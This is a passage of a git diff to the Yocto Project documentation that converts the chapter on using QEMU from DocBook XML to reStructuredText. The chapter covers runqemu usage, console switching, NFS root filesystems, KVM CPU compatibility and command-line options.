- For example, system variables are documented in the
- <ulink url='&YOCTO_DOCS_REF_URL;'>Yocto Project Reference Manual</ulink>.
- </para></listitem>
- <listitem><para>
- Detailed Public Information Not Specific to the
- Yocto Project:
- For example, exhaustive information on how to use the
- Source Control Manager Git is better covered with Internet
- searches and official Git Documentation than through the
- Yocto Project documentation.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='other-information'>
- <title>Other Information</title>
-
- <para>
- Because this manual presents information for many different
- topics, supplemental information is recommended for full
- comprehension.
- For introductory information on the Yocto Project, see the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>.
- If you want to build an image with no knowledge of Yocto Project
- as a way of quickly testing it out, see the
- <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
- document.
- </para>
-
- <para>
- For a comprehensive list of links and other documentation, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#resources-links-and-related-documentation'>Links and Related Documentation</ulink>"
- section in the Yocto Project Reference Manual.
- </para>
-
- <para>
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-manual-qemu.rst b/documentation/dev-manual/dev-manual-qemu.rst
new file mode 100644
index 0000000000..c91e8b5389
--- /dev/null
+++ b/documentation/dev-manual/dev-manual-qemu.rst
@@ -0,0 +1,477 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************************
+Using the Quick EMUlator (QEMU)
+*******************************
+
+The Yocto Project uses an implementation of the Quick EMUlator (QEMU)
+Open Source project as part of the Yocto Project development "tool set".
+This chapter provides both procedures that show you how to use the Quick
+EMUlator (QEMU) and other QEMU information helpful for development
+purposes.
+
+.. _qemu-dev-overview:
+
+Overview
+========
+
+Within the context of the Yocto Project, QEMU is an emulator and
+virtualization machine that allows you to run a complete image you have
+built using the Yocto Project as just another task on your build system.
+QEMU is useful for running and testing images and applications on
+supported Yocto Project architectures without having actual hardware.
+Among other things, the Yocto Project uses QEMU to run automated Quality
+Assurance (QA) tests on final images shipped with each release.
+
+.. note::
+
+ This implementation is not the same as QEMU in general.
+
+This section provides a brief reference for the Yocto Project
+implementation of QEMU.
+
+For official information and documentation on QEMU in general, see the
+following references:
+
+- `QEMU Website <https://wiki.qemu.org/Main_Page>`__\ *:* The official
+ website for the QEMU Open Source project.
+
+- `Documentation <https://wiki.qemu.org/Manual>`__\ *:* The QEMU user
+ manual.
+
+.. _qemu-running-qemu:
+
+Running QEMU
+============
+
+To use QEMU, you need to have QEMU installed and initialized as well as
+have the proper artifacts (i.e. image files and root filesystems)
+available. Follow these general steps to run QEMU:
+
+1. *Install QEMU:* QEMU is made available with the Yocto Project a
+ number of ways. One method is to install a Software Development Kit
+ (SDK). See ":ref:`sdk-manual/sdk-intro:the qemu emulator`" section in the
+ Yocto Project Application Development and the Extensible Software
+ Development Kit (eSDK) manual for information on how to install QEMU.
+
+2. *Setting Up the Environment:* How you set up the QEMU environment
+ depends on how you installed QEMU:
+
+ - If you cloned the ``poky`` repository or you downloaded and
+ unpacked a Yocto Project release tarball, you can source the build
+ environment script (i.e. :ref:`structure-core-script`):
+ ::
+
+ $ cd ~/poky
+ $ source oe-init-build-env
+
+ - If you installed a cross-toolchain, you can run the script that
+ initializes the toolchain. For example, the following commands run
+ the initialization script from the default ``poky_sdk`` directory:
+ ::
+
+ . ~/poky_sdk/environment-setup-core2-64-poky-linux
+
+3. *Ensure the Artifacts are in Place:* You need to be sure you have a
+ pre-built kernel that will boot in QEMU. You also need the target
+ root filesystem for your target machine's architecture:
+
+ - If you have previously built an image for QEMU (e.g. ``qemux86``,
+ ``qemuarm``, and so forth), then the artifacts are in place in
+ your :term:`Build Directory`.
+
+ - If you have not built an image, you can go to the
+ :yocto_dl:`machines/qemu </releases/yocto/yocto-3.1.2/machines/qemu/>` area and download a
+ pre-built image that matches your architecture and can be run on
+ QEMU.
+
+ See the ":ref:`sdk-manual/sdk-appendix-obtain:extracting the root filesystem`"
+ section in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual for information on
+ how to extract a root filesystem.
+
+4. *Run QEMU:* The basic ``runqemu`` command syntax is as follows:
+ ::
+
+ $ runqemu [option ] [...]
+
+ Based on what you provide on the command
+ line, ``runqemu`` does a good job of figuring out what you are trying
+ to do. For example, by default, QEMU looks for the most recently
+ built image according to the timestamp when it needs to look for an
+ image. Minimally, through the use of options, you must provide either
+ a machine name, a virtual machine image (``*wic.vmdk``), or a kernel
+ image (``*.bin``).
+
+ Here are some additional examples to help illustrate further QEMU:
+
+ - This example starts QEMU with MACHINE set to "qemux86-64".
+ Assuming a standard
+ :term:`Build Directory`, ``runqemu``
+ automatically finds the ``bzImage-qemux86-64.bin`` image file and
+ the ``core-image-minimal-qemux86-64-20200218002850.rootfs.ext4``
+ (assuming the current build created a ``core-image-minimal``
+ image).
+
+ .. note::
+
+ When more than one image with the same name exists, QEMU finds
+ and uses the most recently built image according to the
+ timestamp.
+
+ ::
+
+ $ runqemu qemux86-64
+
+ - This example produces the exact same results as the previous
+ example. This command, however, specifically provides the image
+ and root filesystem type.
+ ::
+
+ $ runqemu qemux86-64 core-image-minimal ext4
+
+ - This example specifies to boot an initial RAM disk image and to
+ enable audio in QEMU. For this case, ``runqemu`` set the internal
+ variable ``FSTYPE`` to "cpio.gz". Also, for audio to be enabled,
+ an appropriate driver must be installed (see the previous
+ description for the ``audio`` option for more information).
+ ::
+
+ $ runqemu qemux86-64 ramfs audio
+
+ - This example does not provide enough information for QEMU to
+ launch. While the command does provide a root filesystem type, it
+ must also minimally provide a `MACHINE`, `KERNEL`, or `VM` option.
+ ::
+
+ $ runqemu ext4
+
+ - This example specifies to boot a virtual machine image
+ (``.wic.vmdk`` file). From the ``.wic.vmdk``, ``runqemu``
+ determines the QEMU architecture (`MACHINE`) to be "qemux86-64" and
+ the root filesystem type to be "vmdk".
+ ::
+
+ $ runqemu /home/scott-lenovo/vm/core-image-minimal-qemux86-64.wic.vmdk
+
+Switching Between Consoles
+==========================
+
+When booting or running QEMU, you can switch between supported consoles
+by using Ctrl+Alt+number. For example, Ctrl+Alt+3 switches you to the
+serial console as long as that console is enabled. Being able to switch
+consoles is helpful, for example, if the main QEMU console breaks for
+some reason.
+
+.. note::
+
+ Usually, "2" gets you to the main console and "3" gets you to the
+ serial console.
+
+Removing the Splash Screen
+==========================
+
+You can remove the splash screen when QEMU is booting by using Alt+left.
+Removing the splash screen allows you to see what is happening in the
+background.
+
+Disabling the Cursor Grab
+=========================
+
+The default QEMU integration captures the cursor within the main window.
+It does this since standard mouse devices only provide relative input
+and not absolute coordinates. You then have to break out of the grab
+using the "Ctrl+Alt" key combination. However, the Yocto Project's
+integration of QEMU enables the wacom USB touch pad driver by default to
+allow input of absolute coordinates. This default means that the mouse
+can enter and leave the main window without the grab taking effect
+leading to a better user experience.
+
+.. _qemu-running-under-a-network-file-system-nfs-server:
+
+Running Under a Network File System (NFS) Server
+================================================
+
+One method for running QEMU is to run it on an NFS server. This is
+useful when you need to access the same file system from both the build
+and the emulated system at the same time. It is also worth noting that
+the system does not need root privileges to run. It uses a user space
+NFS server to avoid that. Follow these steps to set up for running QEMU
+using an NFS server.
+
+1. *Extract a Root Filesystem:* Once you are able to run QEMU in your
+ environment, you can use the ``runqemu-extract-sdk`` script, which is
+ located in the ``scripts`` directory along with the ``runqemu``
+ script.
+
+ The ``runqemu-extract-sdk`` takes a root filesystem tarball and
+ extracts it into a location that you specify. Here is an example that
+ takes a file system and extracts it to a directory named
+ ``test-nfs``:
+
+ .. code-block:: none
+
+ runqemu-extract-sdk ./tmp/deploy/images/qemux86-64/core-image-sato-qemux86-64.tar.bz2 test-nfs
+
+2. *Start QEMU:* Once you have extracted the file system, you can run
+ ``runqemu`` normally with the additional location of the file system.
+ You can then also make changes to the files within ``./test-nfs`` and
+ see those changes appear in the image in real time. Here is an
+ example using the ``qemux86`` image:
+
+ .. code-block:: none
+
+ runqemu qemux86-64 ./test-nfs
+
+.. note::
+
+ Should you need to start, stop, or restart the NFS share, you can use
+ the following commands:
+
+ - The following command starts the NFS share:
+ ::
+
+ runqemu-export-rootfs start file-system-location
+
+ - The following command stops the NFS share:
+ ::
+
+ runqemu-export-rootfs stop file-system-location
+
+ - The following command restarts the NFS share:
+ ::
+
+ runqemu-export-rootfs restart file-system-location
+
+.. _qemu-kvm-cpu-compatibility:
+
+QEMU CPU Compatibility Under KVM
+================================
+
+By default, the QEMU build compiles for and targets 64-bit and x86 Intel
+Core2 Duo processors and 32-bit x86 Intel Pentium II processors. QEMU
+builds for and targets these CPU types because they display a broad
+range of CPU feature compatibility with many commonly used CPUs.
+
+Despite this broad range of compatibility, the CPUs could support a
+feature that your host CPU does not support. Although this situation is
+not a problem when QEMU uses software emulation of the feature, it can
+be a problem when QEMU is running with KVM enabled. Specifically,
+software compiled with a certain CPU feature crashes when run on a CPU
+under KVM that does not support that feature. To work around this
+problem, you can override QEMU's runtime CPU setting by changing the
+``QB_CPU_KVM`` variable in ``qemuboot.conf`` in the
+:term:`Build Directory` ``deploy/image``
+directory. This setting specifies a ``-cpu`` option passed into QEMU in
+the ``runqemu`` script. Running ``qemu -cpu help`` returns a list of
+available supported CPU types.
+
+.. _qemu-dev-performance:
+
+QEMU Performance
+================
+
+Using QEMU to emulate your hardware can result in speed issues depending
+on the target and host architecture mix. For example, using the
+``qemux86`` image in the emulator on an Intel-based 32-bit (x86) host
+machine is fast because the target and host architectures match. On the
+other hand, using the ``qemuarm`` image on the same Intel-based host can
+be slower. But, you still achieve faithful emulation of ARM-specific
+issues.
+
+To speed things up, the QEMU images support using ``distcc`` to call a
+cross-compiler outside the emulated system. If you used ``runqemu`` to
+start QEMU, and the ``distccd`` application is present on the host
+system, any BitBake cross-compiling toolchain available from the build
+system is automatically used from within QEMU simply by calling
+``distcc``. You can accomplish this by defining the cross-compiler
+variable (e.g. ``export CC="distcc"``). Alternatively, if you are using
+a suitable SDK image or the appropriate stand-alone toolchain is
+present, the toolchain is also automatically used.
+
+.. note::
+
+ Several mechanisms exist that let you connect to the system running
+ on the QEMU emulator:
+
+ - QEMU provides a framebuffer interface that makes standard consoles
+ available.
+
+ - Generally, headless embedded devices have a serial port. If so,
+ you can configure the operating system of the running image to use
+ that port to run a console. The connection uses standard IP
+ networking.
+
+ - SSH servers exist in some QEMU images. The ``core-image-sato``
+ QEMU image has a Dropbear secure shell (SSH) server that runs with
+ the root password disabled. The ``core-image-full-cmdline`` and
+ ``core-image-lsb`` QEMU images have OpenSSH instead of Dropbear.
+ Including these SSH servers allow you to use standard ``ssh`` and
+ ``scp`` commands. The ``core-image-minimal`` QEMU image, however,
+ contains no SSH server.
+
+ - You can use a provided, user-space NFS server to boot the QEMU
+ session using a local copy of the root filesystem on the host. In
+ order to make this connection, you must extract a root filesystem
+ tarball by using the ``runqemu-extract-sdk`` command. After
+ running the command, you must then point the ``runqemu`` script to
+ the extracted directory instead of a root filesystem image file.
+ See the "`Running Under a Network File System (NFS)
+ Server <#qemu-running-under-a-network-file-system-nfs-server>`__"
+ section for more information.
+
+.. _qemu-dev-command-line-syntax:
+
+QEMU Command-Line Syntax
+========================
+
+The basic ``runqemu`` command syntax is as follows:
+::
+
+ $ runqemu [option ] [...]
+
+Based on what you provide on the command line, ``runqemu`` does a
+good job of figuring out what you are trying to do. For example, by
+default, QEMU looks for the most recently built image according to the
+timestamp when it needs to look for an image. Minimally, through the use
+of options, you must provide either a machine name, a virtual machine
+image (``*wic.vmdk``), or a kernel image (``*.bin``).
+
+Following is the command-line help output for the ``runqemu`` command:
+::
+
+ $ runqemu --help
+
+ Usage: you can run this script with any valid combination
+ of the following environment variables (in any order):
+ KERNEL - the kernel image file to use
+ ROOTFS - the rootfs image file or nfsroot directory to use
+ MACHINE - the machine name (optional, autodetected from KERNEL filename if unspecified)
+ Simplified QEMU command-line options can be passed with:
+ nographic - disable video console
+ serial - enable a serial console on /dev/ttyS0
+ slirp - enable user networking, no root privileges is required
+ kvm - enable KVM when running x86/x86_64 (VT-capable CPU required)
+ kvm-vhost - enable KVM with vhost when running x86/x86_64 (VT-capable CPU required)
+ publicvnc - enable a VNC server open to all hosts
+ audio - enable audio
+ [*/]ovmf* - OVMF firmware file or base name for booting with UEFI
+ tcpserial=<port> - specify tcp serial port number
+ biosdir=<dir> - specify custom bios dir
+ biosfilename=<filename> - specify bios filename
+ qemuparams=<xyz> - specify custom parameters to QEMU
+ bootparams=<xyz> - specify custom kernel parameters during boot
+ help, -h, --help: print this text
+
+ Examples:
+ runqemu
+ runqemu qemuarm
+ runqemu tmp/deploy/images/qemuarm
+ runqemu tmp/deploy/images/qemux86/<qemuboot.conf>
+ runqemu qemux86-64 core-image-sato ext4
+ runqemu qemux86-64 wic-image-minimal wic
+ runqemu path/to/bzImage-qemux86.bin path/to/nfsrootdir/ serial
+ runqemu qemux86 iso/hddimg/wic.vmdk/wic.qcow2/wic.vdi/ramfs/cpio.gz...
+ runqemu qemux86 qemuparams="-m 256"
+ runqemu qemux86 bootparams="psplash=false"
+ runqemu path/to/<image>-<machine>.wic
+ runqemu path/to/<image>-<machine>.wic.vmdk
+
+.. _qemu-dev-runqemu-command-line-options:
+
+``runqemu`` Command-Line Options
+================================
+
+Following is a description of ``runqemu`` options you can provide on the
+command line:
+
+.. note::
+
+ If you do provide some "illegal" option combination or perhaps you do
+ not provide enough in the way of options, ``runqemu``
+ provides appropriate error messaging to help you correct the problem.
+
+- `QEMUARCH`: The QEMU machine architecture, which must be "qemuarm",
+ "qemuarm64", "qemumips", "qemumips64", "qemuppc", "qemux86", or
+ "qemux86-64".
+
+- `VM`: The virtual machine image, which must be a ``.wic.vmdk``
+ file. Use this option when you want to boot a ``.wic.vmdk`` image.
+ The image filename you provide must contain one of the following
+ strings: "qemux86-64", "qemux86", "qemuarm", "qemumips64",
+ "qemumips", "qemuppc", or "qemush4".
+
+- `ROOTFS`: A root filesystem that has one of the following filetype
+ extensions: "ext2", "ext3", "ext4", "jffs2", "nfs", or "btrfs". If
+ the filename you provide for this option uses "nfs", it must provide
+ an explicit root filesystem path.
+
+- `KERNEL`: A kernel image, which is a ``.bin`` file. When you provide a
+ ``.bin`` file, ``runqemu`` detects it and assumes the file is a
+ kernel image.
+
+- `MACHINE`: The architecture of the QEMU machine, which must be one of
+ the following: "qemux86", "qemux86-64", "qemuarm", "qemuarm64",
+ "qemumips", "qemumips64", or "qemuppc". The MACHINE and QEMUARCH
+ options are basically identical. If you do not provide a MACHINE
+ option, ``runqemu`` tries to determine it based on other options.
+
+- ``ramfs``: Indicates you are booting an initial RAM disk (initramfs)
+ image, which means the ``FSTYPE`` is ``cpio.gz``.
+
+- ``iso``: Indicates you are booting an ISO image, which means the
+ ``FSTYPE`` is ``.iso``.
+
+- ``nographic``: Disables the video console, which sets the console to
+ "ttys0". This option is useful when you have logged into a server and
+ you do not want to disable forwarding from the X Window System (X11)
+ to your workstation or laptop.
+
+- ``serial``: Enables a serial console on ``/dev/ttyS0``.
+
+- ``biosdir``: Establishes a custom directory for BIOS, VGA BIOS and
+ keymaps.
+
+- ``biosfilename``: Establishes a custom BIOS name.
+
+- ``qemuparams=\"xyz\"``: Specifies custom QEMU parameters. Use this
+ option to pass options other than the simple "kvm" and "serial"
+ options.
+
+- ``bootparams=\"xyz\"``: Specifies custom boot parameters for the
+ kernel.
+
+- ``audio``: Enables audio in QEMU. The MACHINE option must be either
+ "qemux86" or "qemux86-64" in order for audio to be enabled.
+ Additionally, the ``snd_intel8x0`` or ``snd_ens1370`` driver must be
+ installed in linux guest.
+
+- ``slirp``: Enables "slirp" networking, which is a different way of
+ networking that does not need root access but also is not as easy to
+ use or comprehensive as the default.
+
+- ``kvm``: Enables KVM when running "qemux86" or "qemux86-64" QEMU
+ architectures. For KVM to work, all the following conditions must be
+ met:
+
+ - Your MACHINE must be either qemux86" or "qemux86-64".
+
+ - Your build host has to have the KVM modules installed, which are
+ ``/dev/kvm``.
+
+ - The build host ``/dev/kvm`` directory has to be both writable and
+ readable.
+
+- ``kvm-vhost``: Enables KVM with VHOST support when running "qemux86"
+ or "qemux86-64" QEMU architectures. For KVM with VHOST to work, the
+ following conditions must be met:
+
+ - `kvm <#kvm-cond>`__ option conditions must be met.
+
+ - Your build host has to have virtio net device, which are
+ ``/dev/vhost-net``.
+
+ - The build host ``/dev/vhost-net`` directory has to be either
+ readable or writable and "slirp-enabled".
+
+- ``publicvnc``: Enables a VNC server open to all hosts.
diff --git a/documentation/dev-manual/dev-manual-qemu.xml b/documentation/dev-manual/dev-manual-qemu.xml
deleted file mode 100644
index 5ccc0dfe83..0000000000
--- a/documentation/dev-manual/dev-manual-qemu.xml
+++ /dev/null
@@ -1,690 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='dev-manual-qemu'>
-
-<title>Using the Quick EMUlator (QEMU)</title>
-
- <para>
- The Yocto Project uses an implementation of the Quick EMUlator (QEMU)
- Open Source project as part of the Yocto Project development "tool
- set".
- This chapter provides both procedures that show you how to use the
- Quick EMUlator (QEMU) and other QEMU information helpful for
- development purposes.
- </para>
-
- <section id='qemu-dev-overview'>
- <title>Overview</title>
-
- <para>
- Within the context of the Yocto Project, QEMU is an
- emulator and virtualization machine that allows you to run a
- complete image you have built using the Yocto Project as just
- another task on your build system.
- QEMU is useful for running and testing images and applications on
- supported Yocto Project architectures without having actual
- hardware.
- Among other things, the Yocto Project uses QEMU to run automated
- Quality Assurance (QA) tests on final images shipped with each
- release.
- <note>
- This implementation is not the same as QEMU in general.
- </note>
- This section provides a brief reference for the Yocto Project
- implementation of QEMU.
- </para>
-
- <para>
- For official information and documentation on QEMU in general, see
- the following references:
- <itemizedlist>
- <listitem><para>
- <emphasis><ulink url='http://wiki.qemu.org/Main_Page'>QEMU Website</ulink>:</emphasis>
- The official website for the QEMU Open Source project.
- </para></listitem>
- <listitem><para>
- <emphasis><ulink url='http://wiki.qemu.org/Manual'>Documentation</ulink>:</emphasis>
- The QEMU user manual.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='qemu-running-qemu'>
- <title>Running QEMU</title>
-
- <para>
- To use QEMU, you need to have QEMU installed and initialized as
- well as have the proper artifacts (i.e. image files and root
- filesystems) available.
- Follow these general steps to run QEMU:
- <orderedlist>
- <listitem><para>
- <emphasis>Install QEMU:</emphasis>
- QEMU is made available with the Yocto Project a number of
- ways.
- One method is to install a Software Development Kit (SDK).
- See
- "<ulink url='&YOCTO_DOCS_SDK_URL;#the-qemu-emulator'>The QEMU Emulator</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual
- for information on how to install QEMU.
- </para></listitem>
- <listitem><para>
- <emphasis>Setting Up the Environment:</emphasis>
- How you set up the QEMU environment depends on how you
- installed QEMU:
- <itemizedlist>
- <listitem><para>
- If you cloned the <filename>poky</filename>
- repository or you downloaded and unpacked a
- Yocto Project release tarball, you can source
- the build environment script (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>):
- <literallayout class='monospaced'>
- $ cd ~/poky
- $ source oe-init-build-env
- </literallayout>
- </para></listitem>
- <listitem><para>
- If you installed a cross-toolchain, you can
- run the script that initializes the toolchain.
- For example, the following commands run the
- initialization script from the default
- <filename>poky_sdk</filename> directory:
- <literallayout class='monospaced'>
- . ~/poky_sdk/environment-setup-core2-64-poky-linux
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Ensure the Artifacts are in Place:</emphasis>
- You need to be sure you have a pre-built kernel that
- will boot in QEMU.
- You also need the target root filesystem for your target
- machine’s architecture:
- <itemizedlist>
- <listitem><para>
- If you have previously built an image for QEMU
- (e.g. <filename>qemux86</filename>,
- <filename>qemuarm</filename>, and so forth),
- then the artifacts are in place in your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- </para></listitem>
- <listitem><para>
- If you have not built an image, you can go to the
- <ulink url='&YOCTO_MACHINES_DL_URL;'>machines/qemu</ulink>
- area and download a pre-built image that matches
- your architecture and can be run on QEMU.
- </para></listitem>
- </itemizedlist></para>
-
- <para>See the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extracting-the-root-filesystem'>Extracting the Root Filesystem</ulink>"
- section in the Yocto Project Application Development and
- the Extensible Software Development Kit (eSDK) manual
- for information on how to extract a root filesystem.
- </para></listitem>
- <listitem><para>
- <emphasis>Run QEMU:</emphasis>
- The basic <filename>runqemu</filename> command syntax is as
- follows:
- <literallayout class='monospaced'>
- $ runqemu [<replaceable>option</replaceable> ] [...]
- </literallayout>
- Based on what you provide on the command line,
- <filename>runqemu</filename> does a good job of figuring
- out what you are trying to do.
- For example, by default, QEMU looks for the most recently
- built image according to the timestamp when it needs to
- look for an image.
- Minimally, through the use of options, you must provide
- either a machine name, a virtual machine image
- (<filename>*wic.vmdk</filename>), or a kernel image
- (<filename>*.bin</filename>).</para>
-
- <para>Here are some additional examples to help illustrate
- further QEMU:
- <itemizedlist>
- <listitem><para>
- This example starts QEMU with
- <replaceable>MACHINE</replaceable> set to "qemux86-64".
- Assuming a standard
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- <filename>runqemu</filename> automatically finds the
- <filename>bzImage-qemux86-64.bin</filename> image file and
- the
- <filename>core-image-minimal-qemux86-64-20200218002850.rootfs.ext4</filename>
- (assuming the current build created a
- <filename>core-image-minimal</filename> image).
- <note>
- When more than one image with the same name exists, QEMU finds
- and uses the most recently built image according to the
- timestamp.
- </note>
- <literallayout class='monospaced'>
- $ runqemu qemux86-64
- </literallayout>
- </para></listitem>
- <listitem><para>
- This example produces the exact same results as the
- previous example.
- This command, however, specifically provides the image
- and root filesystem type.
- <literallayout class='monospaced'>
- $ runqemu qemux86-64 core-image-minimal ext4
- </literallayout>
- </para></listitem>
- <listitem><para>
- This example specifies to boot an initial RAM disk image
- and to enable audio in QEMU.
- For this case, <filename>runqemu</filename> set the
- internal variable <filename>FSTYPE</filename> to
- "cpio.gz".
- Also, for audio to be enabled, an appropriate driver must
- be installed (see the previous description for the
- <filename>audio</filename> option for more information).
- <literallayout class='monospaced'>
- $ runqemu qemux86-64 ramfs audio
- </literallayout>
- </para></listitem>
- <listitem><para>
- This example does not provide enough information for
- QEMU to launch.
- While the command does provide a root filesystem type, it
- must also minimally provide a
- <replaceable>MACHINE</replaceable>,
- <replaceable>KERNEL</replaceable>, or
- <replaceable>VM</replaceable> option.
- <literallayout class='monospaced'>
- $ runqemu ext4
- </literallayout>
- </para></listitem>
- <listitem><para>
- This example specifies to boot a virtual machine
- image (<filename>.wic.vmdk</filename> file).
- From the <filename>.wic.vmdk</filename>,
- <filename>runqemu</filename> determines the QEMU
- architecture (<replaceable>MACHINE</replaceable>) to be
- "qemux86-64" and the root filesystem type to be "vmdk".
- <literallayout class='monospaced'>
- $ runqemu /home/scott-lenovo/vm/core-image-minimal-qemux86-64.wic.vmdk
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='switching-between-consoles'>
- <title>Switching Between Consoles</title>
-
- <para>
- When booting or running QEMU, you can switch between
- supported consoles by using
- Ctrl+Alt+<replaceable>number</replaceable>.
- For example, Ctrl+Alt+3 switches you to the serial console
- as long as that console is enabled.
- Being able to switch consoles is helpful, for example, if
- the main QEMU console breaks for some reason.
- <note>
- Usually, "2" gets you to the main console and "3"
- gets you to the serial console.
- </note>
- </para>
- </section>
-
- <section id='removing-the-splash-screen'>
- <title>Removing the Splash Screen</title>
-
- <para>
- You can remove the splash screen when QEMU is booting by
- using Alt+left.
- Removing the splash screen allows you to see what is
- happening in the background.
- </para>
- </section>
-
- <section id='disabling-the-cursor-grab'>
- <title>Disabling the Cursor Grab</title>
-
- <para>
- The default QEMU integration captures the cursor within the
- main window.
- It does this since standard mouse devices only provide
- relative input and not absolute coordinates.
- You then have to break out of the grab using the "Ctrl+Alt"
- key combination.
- However, the Yocto Project's integration of QEMU enables
- the wacom USB touch pad driver by default to allow input
- of absolute coordinates.
- This default means that the mouse can enter and leave the
- main window without the grab taking effect leading to a
- better user experience.
- </para>
- </section>
-
- <section id='qemu-running-under-a-network-file-system-nfs-server'>
- <title>Running Under a Network File System (NFS) Server</title>
-
- <para>
- One method for running QEMU is to run it on an NFS server.
- This is useful when you need to access the same file system
- from both the build and the emulated system at the same time.
- It is also worth noting that the system does not need root
- privileges to run.
- It uses a user space NFS server to avoid that.
- Follow these steps to set up for running QEMU using an NFS
- server.
- <orderedlist>
- <listitem><para>
- <emphasis>Extract a Root Filesystem:</emphasis>
- Once you are able to run QEMU in your environment, you can
- use the <filename>runqemu-extract-sdk</filename> script,
- which is located in the <filename>scripts</filename>
- directory along with the <filename>runqemu</filename>
- script.</para>
-
- <para>The <filename>runqemu-extract-sdk</filename> takes a
- root filesystem tarball and extracts it into a location
- that you specify.
- Here is an example that takes a file system and
- extracts it to a directory named
- <filename>test-nfs</filename>:
- <literallayout class='monospaced'>
- runqemu-extract-sdk ./tmp/deploy/images/qemux86-64/core-image-sato-qemux86-64.tar.bz2 test-nfs
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Start QEMU:</emphasis>
- Once you have extracted the file system, you can run
- <filename>runqemu</filename> normally with the additional
- location of the file system.
- You can then also make changes to the files within
- <filename>./test-nfs</filename> and see those changes
- appear in the image in real time.
- Here is an example using the <filename>qemux86</filename>
- image:
- <literallayout class='monospaced'>
- runqemu qemux86-64 ./test-nfs
- </literallayout>
- </para></listitem>
- </orderedlist>
- <note>
- <para>
- Should you need to start, stop, or restart the NFS share,
- you can use the following commands:
- <itemizedlist>
- <listitem><para>
- The following command starts the NFS share:
- <literallayout class='monospaced'>
- runqemu-export-rootfs start <replaceable>file-system-location</replaceable>
- </literallayout>
- </para></listitem>
- <listitem><para>
- The following command stops the NFS share:
- <literallayout class='monospaced'>
- runqemu-export-rootfs stop <replaceable>file-system-location</replaceable>
- </literallayout>
- </para></listitem>
- <listitem><para>
- The following command restarts the NFS share:
- <literallayout class='monospaced'>
- runqemu-export-rootfs restart <replaceable>file-system-location</replaceable>
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
- </note>
- </para>
- </section>
-
- <section id='qemu-kvm-cpu-compatibility'>
- <title>QEMU CPU Compatibility Under KVM</title>
-
- <para>
- By default, the QEMU build compiles for and targets 64-bit and x86
- <trademark class='registered'>Intel</trademark> <trademark class='trademark'>Core</trademark>2
- Duo processors and 32-bit x86
- <trademark class='registered'>Intel</trademark> <trademark class='registered'>Pentium</trademark>
- II processors.
- QEMU builds for and targets these CPU types because they display
- a broad range of CPU feature compatibility with many commonly
- used CPUs.
- </para>
-
- <para>
- Despite this broad range of compatibility, the CPUs could support
- a feature that your host CPU does not support.
- Although this situation is not a problem when QEMU uses software
- emulation of the feature, it can be a problem when QEMU is
- running with KVM enabled.
- Specifically, software compiled with a certain CPU feature crashes
- when run on a CPU under KVM that does not support that feature.
- To work around this problem, you can override QEMU's runtime CPU
- setting by changing the <filename>QB_CPU_KVM</filename>
- variable in <filename>qemuboot.conf</filename> in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory's</ulink>
- <filename>deploy/image</filename> directory.
- This setting specifies a <filename>-cpu</filename> option
- passed into QEMU in the <filename>runqemu</filename> script.
- Running <filename>qemu -cpu help</filename> returns a list of
- available supported CPU types.
- </para>
- </section>
-
- <section id='qemu-dev-performance'>
- <title>QEMU Performance</title>
-
- <para>
- Using QEMU to emulate your hardware can result in speed issues
- depending on the target and host architecture mix.
- For example, using the <filename>qemux86</filename> image in the
- emulator on an Intel-based 32-bit (x86) host machine is fast
- because the target and host architectures match.
- On the other hand, using the <filename>qemuarm</filename> image
- on the same Intel-based host can be slower.
- But, you still achieve faithful emulation of ARM-specific issues.
- </para>
-
- <para>
- To speed things up, the QEMU images support using
- <filename>distcc</filename> to call a cross-compiler outside the
- emulated system.
- If you used <filename>runqemu</filename> to start QEMU, and the
- <filename>distccd</filename> application is present on the host
- system, any BitBake cross-compiling toolchain available from the
- build system is automatically used from within QEMU simply by
- calling <filename>distcc</filename>.
- You can accomplish this by defining the cross-compiler variable
- (e.g. <filename>export CC="distcc"</filename>).
- Alternatively, if you are using a suitable SDK image or the
- appropriate stand-alone toolchain is present, the toolchain is
- also automatically used.
- <note>
- Several mechanisms exist that let you connect to the system
- running on the QEMU emulator:
- <itemizedlist>
- <listitem><para>
- QEMU provides a framebuffer interface that makes
- standard consoles available.
- </para></listitem>
- <listitem><para>
- Generally, headless embedded devices have a serial port.
- If so, you can configure the operating system of the
- running image to use that port to run a console.
- The connection uses standard IP networking.
- </para></listitem>
- <listitem><para>
- SSH servers exist in some QEMU images.
- The <filename>core-image-sato</filename> QEMU image
- has a Dropbear secure shell (SSH) server that runs
- with the root password disabled.
- The <filename>core-image-full-cmdline</filename> and
- <filename>core-image-lsb</filename> QEMU images
- have OpenSSH instead of Dropbear.
- Including these SSH servers allow you to use standard
- <filename>ssh</filename> and <filename>scp</filename>
- commands.
- The <filename>core-image-minimal</filename> QEMU image,
- however, contains no SSH server.
- </para></listitem>
- <listitem><para>
- You can use a provided, user-space NFS server to boot
- the QEMU session using a local copy of the root
- filesystem on the host.
- In order to make this connection, you must extract a
- root filesystem tarball by using the
- <filename>runqemu-extract-sdk</filename> command.
